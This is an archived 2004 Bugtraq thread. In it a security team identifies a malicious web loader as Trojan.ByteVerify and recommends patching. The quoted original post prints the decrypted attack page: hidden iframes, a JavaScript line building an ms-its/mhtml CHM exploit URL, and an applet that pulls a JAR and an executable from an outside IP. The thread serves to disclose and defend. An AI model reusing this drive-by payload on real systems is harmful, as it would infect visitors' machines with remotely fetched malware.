[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Re: Strange Java Loader (not so strange - Trojan.ByteVerify)
From: K-OTiK Security <Special-Alerts () k-otik ! com>
Date: 2004-12-30 20:55:34
Message-ID: 20041231015802.17957.qmail () www ! securityfocus ! com
[Download RAW message or body]
In-Reply-To: <116798078.20041230073423@gmx.net>
> so far, anyone knows how to protect from this crap?
Update your Windows and your antivirus software !
this attack is known as "Trojan.ByteVerify". It exploits the "Internet \
Explorer/Outlook CHM File Processing Arbitrary Code Execution Vulnerability \
(MS04-013)" and the "Microsoft virtual machine Remote Code execution flaw \
(MS03-011)".
<Symantec>
When Trojan.ByteVerify is executed, it performs the following actions:
Escapes the sandbox restrictions, using Blackbox.class, by doing the following:
Declares a new PermissionDataSet with setFullyTrusted set to TRUE.
Creates a trusted PermissionSet.
Sets permission to PermissionSet by creating its own URLClassLoader class, derived \
from the VerifierBug.class.
Loads Beyond.class using the URLClassLoader from Blackbox.class.
Gains unrestricted rights on the local machine by invoking the .assertPermission \
method of the PolicyEngine class in Beyond.class. [...]
May attempt to retrieve dialer programs and install them on the infected computer. \
The dialer programs may attempt to connect the infected computer to pornographic Web \
sites.
Threat Known As :
Exploit-ByteVerify [McAfee]
Trojan.ByteVerify [Symantec]
Exploit.Java.Bytverify [KAV]
JAVA_BYTVERIFY.A [Trend]
Regards
K-OTik Security Research & Monitoring Team 24/7
http://www.k-otik.com
>
> Hi People,
>
> before reading this,
> dont go on any of the sites
> unless you are sure ;)
>
> after decrypting some stuff, this is the source from:
> http://xxl-size.com/cogo.html
> -------------------------------------
> <iframe src="http://209.8.20.130/dl/adv346.php">
> <iframe src="http://www.awmcash.biz/adverts/14/1.htm">
> -------------------------------------
>
> this is the source from one of the iframes
> (http://209.8.20.130/dl/adv346.php):
> ----------------------------------------------------
> <html><head>
> </head><body>
> <textarea id="cxw" style="display:none;">
> <object data="${PR}" type="text/x-scriptlet"></object>
> </textarea>
>
> <script language="javascript">
> document.write(cxw.value.replace(/\${PR}/g,'ms-its:mhtml:file://c:\\nosuch.mht!http://209.8.20.130/dl/adv346/x.chm::/x.htm'));
> </script>
> <applet width=1 height=1 ARCHIVE=loaderadv346.jar \
> code=Counter></APPLET></body></html>
> ----------------------------------------------------
>
> the jar archive loaderadv346.jar contains some java classes
> which exploits the URLClassLoader bug (BlackBox.class).
> it overrides the sandbox and downloads a loadadv346.exe from:
> http://209.8.20.130/dl/loadadv346.exe
>
> this seems to be a dialer or something like this,
> it changes the hosts file, creates some spawn files,
> you can look for yourself, i included the file
> and the java stuff, the loadadv is upx'd,
>
> so far, anyone knows how to protect from this crap?
> you're welcome to send some solutions ;)
>
> cya, Stefan
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic